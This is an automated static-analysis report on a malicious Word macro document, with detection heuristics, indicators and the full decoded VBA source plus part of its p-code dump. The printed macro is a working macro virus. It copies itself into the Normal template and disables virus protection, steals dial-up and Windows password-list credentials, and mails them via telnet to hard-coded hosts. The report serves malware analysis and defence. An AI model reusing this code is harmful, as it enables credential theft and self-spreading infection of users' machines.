Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 81a878a3434e0a50…

MALICIOUS

Office (OLE)

59.5 KB Created: 1996-10-29 13:24:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14
MD5: 507cd7e15e51fd482f8858068579c807 SHA-1: 88e619a28839c6d8bc1bf33648fbeb1fc408f0eb SHA-256: 81a878a3434e0a50399795e6baad38743fdd49ad976caf6ba7ee7ff359b10039
366 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are indicative of older malware techniques. The critical OLE_VBA_SHELL heuristic firing confirms the use of the Shell() function, which is used to execute arbitrary code. The macros also attempt to copy themselves to the Normal template, likely to establish persistence and facilitate further execution. The presence of 'Doc.Trojan.NPR-2' and 'Win.Trojan.C-286' detections further solidifies the malicious nature of the file.

Heuristics 10

  • ClamAV: Doc.Trojan.NPR-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Trojan.NPR-2
  • VBA macros detected medium 5 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Potential Shell call in VBA critical OLE_VBA_SHELL
    Potential Shell call in VBA
    Matched line in script
    Shell "telnet", 0
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
      Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub AutoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Bare IPv4 address in VBA string literal (3 addresses) low OLE_VBA_BARE_IPV4_LITERAL
    VBA source contains one or more globally-routable IPv4 addresses as plain string literals with no URL scheme. These are commonly C2 or download hosts that only get http:// prepended at runtime, so the normal URL extractors miss them. Surfaced as http://<ip> IOCs. Private, reserved and version/build-shaped values are excluded.
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://194.186.182.26 Referenced by macro
    • http://195.75.32.20Referenced by macro
    • http://194.67.1.159Referenced by macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 42850 bytes
SHA-256: f6d46d6673b6011710a3407eed38bb63a443352251023977afd11d0bf56a9b4b
Detection
ClamAV: Win.Trojan.C-286
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "0{00020906-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "MSPlus"
Option Explicit
Declare Function SendMessage Lib "user32.dll" Alias "SendMessageA" (ByVal hWnd As Long, ByVal Msg As Long, wParam As Any, lParam As Any) As Long
Declare Function FindWindow Lib "user32.dll" Alias _
"FindWindowA" (ByVal lpClassName As Any, _
ByVal lpWindowName As Any) As Long
Sub AutoOpen()
Dim Yes As Boolean
Dim Source As String
Dim VBComponent As Object
On Error Resume Next
ActiveDocument.ShowSpellingErrors = False
ActiveDocument.ShowGrammaticalErrors = False
Source = MacroContainer.FullName
Yes = False
For Each VBComponent In NormalTemplate.VBProject.VBComponents
 If VBComponent.Name = "MSPlus" Then
  Yes = True
 End If
Next
 If Yes = False Then
 CopyModule NormalTemplate.FullName, Source
 End If
  Options.VirusProtection = False
 Options.SaveNormalPrompt = False
 NormalTemplate.Save
End Sub
Sub CopyModule(Target As String, Source_ As String)
Dim VBComponent As Object
On Error Resume Next
Application.OrganizerCopy _
  Source:=Source_, _
  Destination:=Target, _
  Name:="MSPlus", _
  Object:=wdOrganizerObjectProjectItems
For Each VBComponent In MacroContainer.VBProject.VBComponents
  If VBComponent.Name <> "ThisDocument" Then
   Application.OrganizerCopy _
    Source:=Source_, _
    Destination:=Target, _
    Name:=VBComponent.Name, _
    Object:=wdOrganizerObjectProjectItems
 End If
Next

End Sub
Sub AutoExit()
Application.Visible = False
Tmsn
End Sub
Sub FileOpen()
AutoOpen
Dialogs(80).Show
Tmsn
End Sub
Sub FileSave()
On Error Resume Next
ActiveDocument.Save
Tmsn
End Sub
Sub FileClose()
On Error Resume Next
AutoOpen
ActiveDocument.Close
End Sub
Sub AutoClose()
AutoOpen
End Sub
Sub Tmsn()
Dim Delta As Integer
Dim Old As Byte
Dim NF As Integer
NF = FreeFile
On Error Resume Next
Open "c:\windows\logow.sys" For Binary Access Read As #NF
Get #NF, 76989, Old
Close #NF
Delta = Val(Mid(Date$, 4, 2))
Delta = Delta - Old
Select Case Delta
 Case Is > 2
 Sender
 Case Is < 0 And Delta + 31 > 2
 Sender
 Case Else
 End Select
End Sub
Sub Sender()
Dim Handle As Long
Dim HandleBW As Long
Dim hWnd As Long
Dim FileName As String
Dim Start As Long
Dim MyDat As Byte
Dim i As Integer
Dim NPwl() As String
Dim j As Integer
Dim Title As String
Dim SMTP As String
Dim Host(1 To 5) As String
Dim A() As Integer
Dim f As Integer
Dim NF As Integer
Dim THwnd As Long
Dim TWnd As String
Dim None As String
On Error Resume Next
If Chkip > 400 Then
Host(1) = "chat.ru"
Host(2) = "mail.iname.com"
Host(3) = "194.186.182.26"
Host(4) = "195.75.32.20"
Host(5) = "194.67.1.159"
Loto 5, A()
For f = 1 To 5
Shell "telnet", 0
  THwnd = FindWindow(CLng(0), "Telnet - (none)")
  If THwnd <> 0 Then
    TWnd = "telnet"
    None = "(none)"
   Else
   THwnd = FindWindow(CLng(0), "Òåëíåò - (íåò)")
   If THwnd <> 0 Then
   TWnd = "Òåëíåò - "
    None = "(íåò)"
    Else
   THwnd = FindWindow(CLng(0), "Telnet - (íåò)")
   TWnd = "telnet - "
    None = "(íåò)"
  End If
  End If
SendMessage THwnd, CLng(16), ByVal CLng(0), 0
Shell "telnet " + Host(A(f)) + " 25", 0
DoEvents
Start = Timer
Do Until Handle <> 0 Or Timer - Start > 60 Or HandleBW <> 0
 Handle = FindWindow(CLng(0), TWnd + " - " + Host(A(f)))
 HandleBW = FindWindow(CLng(0), "Connect failed")
 DoEvents
Loop
Select Case Handle
  Case Is <> 0
SMTP = "helo selena#$mail from: <cookie@mail.ru>#rcpt to: <kashek@usa.net>#$data#$Date: " + _
 Date$ + " " + Time$ + "#X-MSMail-Priority: Normal#X-Priority: 3#X-Mailer: Post Messenger 3.1#MIME-Version: 1.0#Content-Type: multipart/mixed; boundary=" _
 + Chr(34) + "----=_NextPart" + Chr(34) + "#Content-Transfer-Encoding: 7bit##------=_NextPart#Content-Type: text/plain; charset=Windows-1251#Content-Transfer-Encoding: base64#"
Filler SMTP, Handle
Pause 1
Grab FileName
SMTP = Base64(FileName)
Kill "c:\windows\" + FileName
SMTP = Adapt(SMTP)
Filler SMTP, Handle
Pause 1
FindPWL i, NPwl()
If i <> 0 Then
 For j = 0 To i - 1
  If FileLen("c:\windows\" + NPwl(j)) <> 688 Then
   SMTP = Base64(NPwl(j))
   SMTP = Adapt(SMTP)
      Title = "#------=_NextPart#Content-Type: application/octet-stream; name=" + Chr(34) _
   + NPwl(j) + Chr(34) + "#Content-Transfer-Encoding: base64#Content-Description: " + _
   NPwl(j) + "(PWL PassWord List)#Content-Disposition: attachment; filename=" _
   + Chr(34) + NPwl(j) + Chr(34) + "#"
      Filler Title, Handle
   Pause 1
   Filler SMTP, Handle
   Pause 1
  End If
 Next
End If
Title = "##------=_NextPart--#.#quit#"
Filler Title, Handle
Pause 1
Start = Timer
Do Until hWnd <> 0 Or Timer - Start > 150
 hWnd = FindWindow(CLng(0), TWnd)
 DoEvents
Loop
Select Case hWnd
Case Is = 0
  SendMessage Handle, CLng(16), ByVal CLng(0), 0
  Handle = 0
Case Else
  SendMessage hWnd, CLng(16), ByVal CLng(0), 0
    NF = FreeFile
  MyDat = Val(Mid(Date$, 4, 2))
  Open "c:\windows\logow.sys" For Binary Access Write As #NF
  Put #NF, 76989, MyDat
  Close #NF
  DoEvents
  SendMessage Handle, CLng(16), ByVal CLng(0), 0
  Exit Sub
End Select
Case Else
Handle = FindWindow(CLng(0), TWnd + " - " + None)
SendMessage Handle, CLng(16), ByVal CLng(0), 0
Handle = 0
End Select
Next
End If
End Sub
Function Chkip()
Dim hWnd As Long
Dim Start As Long
Dim A As Long
Dim i As Long
Dim NF As Integer
Dim NF1 As Integer
On Error Resume Next
NF = FreeFile
Open "c:\windows\chkip.bat" For Output Access Write As #NF
Print #NF, "route print > c:\windows\chkip.bmp"
Close #NF
Shell "c:\windows\chkip.bat", 0
Start = Timer
 Do While FindWindow(CLng(0), "(Ñåàíñ çàâåðøåí) - chkip") = 0
        DoEvents
        If Timer > Start + 10 Then
         Exit Function
        End If
 Loop
hWnd = FindWindow(CLng(0), "(Ñåàíñ çàâåðøåí) - chkip")
SendMessage hWnd, CLng(16), ByVal CLng(0), 0
Chkip = FileLen("c:\windows\chkip.bmp")
A = 255
NF = FreeFile
Open "c:\windows\chkip.bat" For Binary Access Write As #NF
NF1 = FreeFile
Open "c:\windows\chkip.bmp" For Binary Access Write As #NF1
For i = 1 To LOF(NF)
 Put #NF, i, A
Next
For i = 1 To LOF(NF1)
 Put #NF1, i, A
Next
Close #NF
Close #NF1
Kill "c:\windows\chkip.bat"
Kill "c:\windows\chkip.bmp"
End Function
Function Loto(i As Integer, A() As Integer)
Dim n As Integer
ReDim A(1 To i) As Integer
Dim Tmp As Integer
Dim Temp As Integer
For n = 1 To i
 A(n) = n
Next
For n = 1 To i
 Tmp = Int((i - n + 1) * Rnd + n)
 Temp = A(n)
 A(n) = A(Tmp)
 A(Tmp) = Temp
Next

End Function
Sub Filler(MessStr As String, hWnd As Long)
Dim i As Long
Dim Tmp As String
Dim Charset As Long
On Error Resume Next
For i = 1 To Len(MessStr)
Tmp = Mid(MessStr, i, 1)
Select Case Tmp
   Case Is = "#"
   DoEvents
   Charset = SendMessage(hWnd, &H102, ByVal CLng(13), 0)
   Case Is = "$"
   Pause 7
   Case Else
   Charset = SendMessage(hWnd, &H102, ByVal CLng(Asc(Tmp)), 0)
End Select
Next
End Sub
Sub Pause(i As Byte)
Dim Start As Long
Start = Timer
 Do While Timer < Start + i
        DoEvents
 Loop
End Sub
Function Grab(Name As String)
Dim Tmp As String
Dim AZ As String
Dim i As Integer
Dim Num As Integer
Dim PwdLst As String
Dim Temp As String
Dim Counter As Long
Dim NF As Integer
Dim NF1 As Integer
AZ = "abcdifghijklmnopqastuvwxyz"
For i = 1 To 7
 Num = Random1(25)
 Name = Name + Mid(AZ, Num + 1, 1)
Next
Name = Name + ".egn"
On Error Resume Next
NF1 = FreeFile
Open "c:\windows\" + Name For Output Access Write As #NF1
If Dir$("c:\windows\edialer.ini") <> "" Then
NF = FreeFile
Open "c:\windows\edialer.ini" For Input Access Read As #NF
Do While Not EOF(NF)
  Line Input #NF, Tmp
  If InStr(1, Tmp, "[RAS_Entry_") <> 0 Or _
     InStr(1, Tmp, "PasswordSaved") <> 0 Or _
     InStr(1, Tmp, "LoginSaved") <> 0 Then
   Print #NF1, Tmp
  End If
Loop
Close #NF
End If
If Dir$("C:\Windows\system.ini") <> "" Then
NF = FreeFile
Open "C:\Windows\system.ini" For Input Access Read As #NF
Do While Not EOF(NF)
 Line Input #NF, Temp
 Counter = Counter + 1
 If Temp = "[Password Lists]" Then
  Do While Temp <> ""
  Line Input #NF, Temp
  PwdLst = PwdLst + Chr(10) + Temp
  Loop
 Exit Do
 End If
   If Counter Mod 20 = 0 Then
   DoEvents
   End If
Loop
End If
Close #NF
Print #NF1, PwdLst
Close #NF1
End Function
Function Base64(FName As String)
Dim i As Long
Dim ABC As String
Dim Tmp As String
Dim Char As Byte
Dim Cod As Integer
Dim Roll As Integer
Dim Counter As Long
'
Dim HMask As Integer
Dim LMask As Integer
Dim Shift As Integer
Dim NF As Integer


HMask = 252
LMask = 3
Shift = 16
Roll = 0
Counter = 1
ABC = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"
NF = FreeFile
On Error Resume Next
Open "c:\windows\" + FName For Binary Access Read As #NF
For i = 1 To LOF(NF)
Get #NF, Counter, Char
Cod = ((Char And HMask) \ (LMask + 1)) Or Roll
Roll = (Char And LMask) * Shift
Tmp = Tmp + Mid$(ABC, Cod + 1, 1)
HMask = HMask * 4 And 255
LMask = LMask * 4 + 3
Shift = Shift \ 4
If HMask = 0 Then
 Tmp = Tmp + Mid$(ABC, Roll + 1, 1)
 HMask = 252
 LMask = 3
 Shift = 16
 Roll = 0
End If
Counter = Counter + 1
Next
Close #NF
If Shift < 16 Then
 Tmp = Tmp + Mid$(ABC, Roll + 1, 1)
End If
Cod = ((Len(Tmp)) Mod 4)
If Cod Then
Tmp = Tmp + String$(4 - Cod, "=")
End If
Base64 = Tmp
End Function
Function FindPWL(j As Integer, FindFiles() As String)
ReDim FindFiles(0)
FindFiles(0) = Dir$("c:\windows\*.pwl")
If FindFiles(0) = "" Then
Exit Function
End If
j = 0
Do While FindFiles(0) <> ""
FindFiles(0) = Dir
j = j + 1
Loop
If j > 1 Then
ReDim FindFiles(0 To j - 1)
FindFiles(0) = Dir$("c:\windows\*.pwl")
For j = 1 To j - 1
FindFiles(j) = Dir$
Next j
Else
FindFiles(0) = Dir$("c:\windows\*.pwl")
End If
End Function
Function Adapt(Cod As String)
Dim PostCod As String
Dim i As Long
On Error Resume Next
For i = 1 To Len(Cod)
 If i >= 76 And (i Mod 76) = 0 Then
  PostCod = PostCod + Mid(Cod, i, 1) + "#"
  Else
  PostCod = PostCod + Mid(Cod, i, 1)
 End If
Next
Adapt = "#" + PostCod + "#"
End Function
Function Random1(i As Integer)
Dim Resalt As Integer
Resalt = Int(i * Rnd + 1)
Random1 = Resalt
End Function
Sub ViewVBCode()
Deleter
ShowVisualBasicEditor = True
End Sub
Sub ToolsMacro()
Deleter
Dialogs(wdDialogToolsMacro).Display
End Sub
Sub Deleter()
Dim TempPath As String, TempName As String
Dim Docum As Object
Dim VBComp As Object
On Error Resume Next
For Each VBComp In NormalTemplate.VBProject.VBComponents
 If VBComp.Name <> "ThisDocument" Then
  With NormalTemplate.VBProject.VBComponents(VBComp.Name).CodeModule
    .DeleteLines 1, .CountOfLines
  End With
 Application.OrganizerDelete NormalTemplate.Name, VBComp.Name, wdOrganizerObjectProjectItems
 End If
Next
For Each VBComp In ActiveDocument.VBProject.VBComponents
 Debug.Print VBComp.Name
  If VBComp.Name <> "ThisDocument" Then
   With ActiveDocument.VBProject.VBComponents(VBComp.Name).CodeModule
    .DeleteLines 1, .CountOfLines
   End With
   Application.OrganizerDelete ActiveDocument.Name, VBComp.Name, wdOrganizerObjectProjectItems
   End If
Next
Options.SaveNormalPrompt = True
End Sub
Sub ToolsOptions()
With Options
.VirusProtection = True
.SaveNormalPrompt = True
End With
Dialogs(wdDialogToolsOptions).Show
With Options
.VirusProtection = False
.SaveNormalPrompt = False
End With
End Sub










' Processing file: /tmp/qstore__jnhgc3u
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 965 bytes
' Macros/VBA/MSPlus - 23684 bytes
' Line #0:
' 	Option  (Explicit)
' Line #1:
' 	FuncDefn (Declare Function SendMessage Lib "user32.dll" (ByVal hWnd As Long, ByVal Msg As Long, wParam As , lParam As ) As Long)
' Line #2:
' 	LineCont 0x0008 06 00 00 00 0D 00 00 00
' 	FuncDefn (Declare Function FindWindow Lib "user32.dll" (ByVal lpClassName As , ByVal lpWindowName As ) As Long)
' Line #3:
' 	FuncDefn (Sub AutoOpen())
' Line #4:
' 	Dim 
' 	VarDefn Yes (As Boolean)
' Line #5:
' 	Dim 
' 	VarDefn Source (As String)
' Line #6:
' 	Dim 
' 	VarDefn VBComponent (As Object)
' Line #7:
' 	OnError (Resume Next) 
' Line #8:
' 	LitVarSpecial (False)
' 	Ld ActiveDocument 
' 	MemSt ShowSpellingErrors 
' Line #9:
' 	LitVarSpecial (False)
' 	Ld ActiveDocument 
' 	MemSt ShowGrammaticalErrors 
' Line #10:
' 	Ld MacroContainer 
' 	MemLd FullName 
' 	St Source 
' Line #11:
' 	LitVarSpecial (False)
' 	St Yes 
' Line #12:
' 	StartForVariable 
' 	Ld VBComponent 
' 	EndForVariable 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ForEach 
' Line #13:
' 	Ld VBComponent 
' 	MemLd New 
' 	LitStr 0x0006 "MSPlus"
' 	Eq 
' 	IfBlock 
' Line #14:
' 	LitVarSpecial (True)
' 	St Yes 
' Line #15:
' 	EndIfBlock 
' Line #16:
' 	StartForVariable 
' 	Next 
' Line #17:
' 	Ld Yes 
' 	LitVarSpecial (False)
' 	Eq 
' 	IfBlock 
' Line #18:
' 	Ld NormalTemplate 
' 	MemLd FullName 
' 	Ld Source 
' 	ArgsCall CopyModule 0x0002 
' Line #19:
' 	EndIfBlock 
' Line #20:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #21:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt SaveNormalPrompt 
' Line #22:
' 	Ld NormalTemplate 
' 	ArgsMemCall Save 0x0000 
' Line #23:
' 	EndSub 
' Line #24:
' 	FuncDefn (Sub CopyModule(Target As String, Source_ As String))
' Line #25:
' 	Dim 
' 	VarDefn VBComponent (As Object)
' Line #26:
' 	OnError (Resume Next) 
' Line #27:
' 	LineCont 0x0010 03 00 02 00 07 00 02 00 0B 00 02 00 0F 00 02 00
' 	Ld Source_ 
' 	ParamNamed Source 
' 	Ld Target 
' 	ParamNamed Destination 
' 	LitStr 0x0006 "MSPlus"
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #28:
' 	StartForVariable 
' 	Ld VBComponent 
' 	EndForVariable 
' 	Ld MacroContainer 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ForEach 
' Line #29:
' 	Ld VBComponent 
' 	MemLd New 
' 	LitStr 0x000C "ThisDocument"
' 	Ne 
' 	IfBlock 
' Line #30:
' 	LineCont 0x0010 03 00 04 00 07 00 04 00 0B 00 04 00 11 00 04 00
' 	Ld Source_ 
' 	ParamNamed Source 
' 	Ld Target 
' 	ParamNamed Destination 
' 	Ld VBComponent 
' 	MemLd New 
' 	ParamNamed New 
' 	Ld wdOrganizerObjectProjectItems 
' 	ParamNamed On 
' 	Ld Application 
' 	ArgsMemCall OrganizerCopy 0x0004 
' Line #31:
' 	EndIfBlock 
' Line #32:
' 	StartForVariable 
' 	Next 
' Line #33:
' Line #34:
' 	EndSub 
' Line #35:
' 	FuncDefn (Sub AutoExit())
' Line #36:
' 	LitVarSpecial (False)
' 	Ld Application 
' 	MemSt Visible 
' Line #37:
' 	ArgsCall Tmsn 0x0000 
' Line #38:
' 	EndSub 
' Line #39:
' 	FuncDefn (Sub FileOpen())
' Line #40:
' 	ArgsCall AutoOpen 0x0000 
' Line #41:
' 	LitDI2 0x0050 
' 	ArgsLd Dialogs 0x0001 
' 	ArgsMemCall Show 0x0000 
' Line #42:
' 	ArgsCall Tmsn 0x0000 
' Line #43:
' 	EndSub 
' Line #44:
' 	FuncDefn (Sub FileSave())
' Line #45:
' 	OnError (Resume Next) 
' Line #46:
' 	Ld ActiveDocument 
' 	ArgsMemCall Save 0x0000 
' Line #47:
' 	ArgsCall Tmsn 0x0000 
' Line #48:
' 	EndSub 
' Line #49:
' 	FuncDefn (Sub FileClose())
' Line #50:
' 	OnError (Resume Next) 
' Line #51:
' 	ArgsCall AutoOpen 0x0000 
' Line #52:
' 	Ld ActiveDocument 
' 	ArgsMemCall Close 0x0000 
' Line #53:
' 	EndSub 
' Line #54:
' 	FuncDefn (Sub AutoClose())
' Line #55:
' 	ArgsCall AutoOpen 0x0000 
' Line #56:
' 	EndSub 
' Line #57:
' 	FuncDefn (Sub Tmsn())
' Line #58:
' 	Dim 
' 	VarDefn Delta (As Integer)
' Line #59:
' 	Dim 
' 	VarDefn Old (As Byte)
' Line #60:
' 	Dim 
' 	VarDefn NF (As Integer)
' Line #61:
' 	Ld Friend 
' 	St NF 
' Line #62:
' 	OnError (Resume Next) 
' Line #63:
' 	LitStr 0x0014 "c:\windows\logow.sys"
' 	Ld NF 
' 	Sharp 
' 	LitDefault 
' 	Open (For Binary Access Read)
' Line #64:
' 	Ld NF 
' 	Sharp 
' 	LitDI4 0x2CBD 0x0001 
' 	Ld Old 
' 	GetRec 
' Line #65:
' 	Ld NF 
' 	Sharp 
' 	Close 0x0001 
' Line #66:
' 	Ld Date$ 
' 	LitDI2 0x0004 
' 	LitDI2 0x0002 
' 	ArgsLd Mid$ 0x0003 
' 	ArgsLd Val 0x0001 
' 	St Delta 
' Line #67:
' 	Ld Delta 
' 	Ld Old 
' 	Sub 
' 	St Delta 
' Line #68:
' 	Ld Delta 
' 	SelectCase 
' Line #69:
' 	LitDI2 0x0002 
' 	CaseGt 
' 	CaseDone 
' Line #70:
' 	ArgsCall Sender 0x0000 
' Line #71:
' 	LitDI2 0x0000 
' 	Ld Delta 
' 	LitDI2 0x001F 
' 	Add 
' 	LitDI2 0x0002 
' 	Gt 
' 	And 
' 	CaseLt 
' 	CaseDone 
' Line #72:
' 	ArgsCall Sender 0x0000 
' Line #73:
' 	CaseElse 
' Line #74:
' 	EndSelect 
' Line #75:
' 	EndSub 
' Line #76:
' 	FuncDefn (Sub Sender())
' Line #77:
' 	Dim 
' 	VarDefn Handle (As Long)
' Line #78:
' 	Dim 
' 	VarDefn HandleBW (As Long)
' Line #79:
' 	Dim 
' 	VarDefn hWnd (As Long)
' Line #80:
' 	Dim 
' 	VarDefn FileName (As String)
' Line #81:
' 	Dim 
' 	VarDefn Start (As Long)
' Line #82:
' 	Dim 
' 	VarDefn MyDat (As Byte)
' Line #83:
' 	Dim 
' 	VarDefn i (As Integer)
' Line #84:
' 	Dim 
' 	VarDefn NPwl (As String)
' Line #85:
' 	Dim 
' 	VarDefn j (As Integer)
' Line #86:
' 	Dim 
' 	VarDefn Title (As String)
' Line #87:
' 	Dim 
' 	VarDefn SMTP (As String)
' Line #88:
' 	Dim 
' 	LitDI2 0x0001 
' 	LitDI2 0x0005 
' 	VarDefn Host (As String)
' Line #89:
' 	Dim 
' 	VarDefn A (As Integer)
' Line #90:
' 	Dim 
' 	VarDefn False (As Integer)
' Line #91:
' 	Dim 
' 	VarDefn NF (As Integer)
' Line #92:
' 	Dim 
' 	VarDefn THwnd (As Long)
' Line #93:
' 	Dim 
' 	VarDefn TWnd (As String)
' Line #94:
' 	Dim 
' 	VarDefn None (As String)
' Line #95:
' 	OnError (Resume Next) 
' Line #96:
' 	Ld Chkip 
' 	LitDI2 0x0190 
' 	Gt 
' 	IfBlock 
' Line #97:
' 	LitStr 0x0007 "chat.ru"
' 	LitDI2 0x0001 
' 	ArgsSt Host 0x0001 
' Line #98:
' 	LitStr 0x000E "mail.iname.com"
' 	LitDI2 0x0002 
' 	ArgsSt Host 0x0001 
' Line #99:
' 	LitStr 0x000E "194.186.182.26"
' 	LitDI2 0x0003 
' 	ArgsSt Host 0x0001 
' Line #100:
' 	LitStr 0x000C "195.75.32.20"
' 	LitDI2 0x0004 
' 	ArgsSt Host 0x0001 
' Line #101:
' 	LitStr 0x000C "194.67.1.159"
' 	LitDI2 0x0005 
' 	ArgsSt Host 0x0001 
' Line #102:
' 	LitDI2 0x0005 
' 	ArgsLd A 0x0000 
' 	ArgsCall Loto 0x0002 
' Line #103:
' 	StartForVariable 
' 	Ld False 
' 	EndForVariable 
' 	LitDI2 0x0001 
' 	LitDI2 0x0005 
' 	For 
' Line #104:
' 	LitStr 0x0006 "telnet"
' 	LitDI2 0x0000 
' 	ArgsCall Shell 0x0002 
' Line #105:
' 	LitDI2 0x0000 
' 	Coerce (Lng) 
' 	LitStr 0x000F "Telnet - (none)"
' 	ArgsLd FindWindow 0x0002 
' 	St THwnd 
' Line #106:
' 	Ld THwnd 
' 	LitDI2 0x0000 
' 	Ne 
' 	IfBlock 
' Line #107:
' 	LitStr 0x0006 "telnet"
' 	St TWnd 
' Line #108:
' 	LitStr 0x0006 "(none)"
' 	St None 
' Line #109:
' 	ElseBlock 
' Line #110:
' 	LitDI2 0x0000 
' 	Coerce (Lng) 
' 	LitStr 0x000E "Òåëíåò - (íåò)"
' 	ArgsLd FindWindow 0x0002 
' 	St THwnd 
' Line #111:
' 	Ld THwnd 
' 	LitDI2 0x0000 
' 	Ne 
' 	IfBlock 
' Line #112:
' 	LitStr 0x0009 "Òåëíåò - "
' 	St TWnd 
' Line #113:
' 	LitStr 0x0005 "(íåò)"
' 	St None 
' Line #114:
' 	ElseBlock 
' Line #115:
' 	LitDI2 0x0000 
' 	Coerce (Lng) 
' 	LitStr 0x000E "Telnet - (íåò)"
' 	ArgsLd FindWindow 0x0002 
' 	St THwnd 
' Line #116:
' 	LitStr 0x0009 "telnet - "
' 	St TWnd 
' Line #117:
' 	LitStr 0x0005 "(íåò)"
' 	St None 
' Line #118:
' 	EndIfBlock 
' Line #119:
' 	EndIfBlock 
' Line #120:
' 	Ld THwnd 
' 	LitDI2 0x0010 
' 	Coerce (Lng) 
' 	LitDI2 0x0000 
' 	Coerce (Lng) 
' 	ParamByVal 
' 	LitDI2 0x0000 
' 	ArgsCall SendMessage 0x0004 
' Line #121:
' 	LitStr 0x0007 "telnet "
' 	Ld False 
' 	ArgsLd A 0x0001 
' 	ArgsLd Host 0x0001 
' 	Add 
' 	LitStr 0x0003 " 25"
' 	Add 
' 	LitDI2 0x0000 
' 	ArgsCall Shell 0x0002 
' Line #122:
' 	ArgsCall DoEvents 0x0000 
' Line #123:
' 	Ld Timer 
' 	St Start 
' Line #124:
' 	Ld Handle 
' 	LitDI2 0x0000 
' 	Ne 
' 	Ld Timer 
' 	Ld Start 
' 	Sub 
' 	LitDI2 0x003C 
' 	Gt 
' 	Or 
' 	Ld HandleBW 
' 	LitDI2 0x0000 
' 	Ne 
' 	Or 
' 	DoUnitil 
' Line #125:
' 	LitDI2 0x0000 
' 	Coerce (Lng) 
' 	Ld TWnd 
' 	LitStr 0x0003 " - "
' 	Add 
' 	Ld False 
' 	ArgsLd A 0x0001 
' 	ArgsLd Host 0x0001 
' 	Add 
' 	ArgsLd FindWindow 0x0002 
' 	St Handle 
' Line #126:
' 	LitDI2 0x0000 
' 	Coerce (Lng) 
' 	LitStr 0x000E "Connect failed"
' 	ArgsLd FindWindow 0x0002 
' 	St HandleBW 
' Line #127:
' 	ArgsCall DoEvents 0x0000 
' Line #128:
' 	Loop 
' Line #129:
' 	Ld Handle 
' 	SelectCase 
' Line #130:
' 	LitDI2 0x0000 
' 	CaseNe 
' 	CaseDone 
' Line #131:
' 	LineCont 0x0008 04 00 01 00 0B 00 01 00
' 	LitStr 0x0050 "helo selena#$mail from: <cookie@mail.ru>#rcpt to: <kashek@usa.net>#$data#$Date: "
' 	Ld Date$ 
' 	Add 
' 	LitStr 0x0001 " "
' 	Add 
' 	Ld Time$ 
' 	Add 
' 	LitStr 0x0080 "#X-MSMail-Priority: Normal#X-Priority: 3#X-Mailer: Post Messenger 3.1#MIME-Version: 1.0#Content-Type: multipart/mixed; boundary="
' 	Add 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	LitStr 0x000E "----=_NextPart"
' 	Add 
' 	LitDI2 0x0022 
' 	ArgsLd Chr 0x0001 
' 	Add 
' 	LitStr 0x0084 "#Content-Transfer-Encoding: 7bit##------=_NextPart#Content-Type: text/plain; charset=Windows-1251#Content-Transfer-Encoding: base64#"
' 	Add 
' 	St SMTP 
' Line #132:
' 	Ld SMTP 
' 	Ld Handle 
' 	ArgsCall Filler 0x0002 
' Line #133:
' 	LitDI2 0x0001 
' 	ArgsCall Pause 0x0001 
' Line #134:
…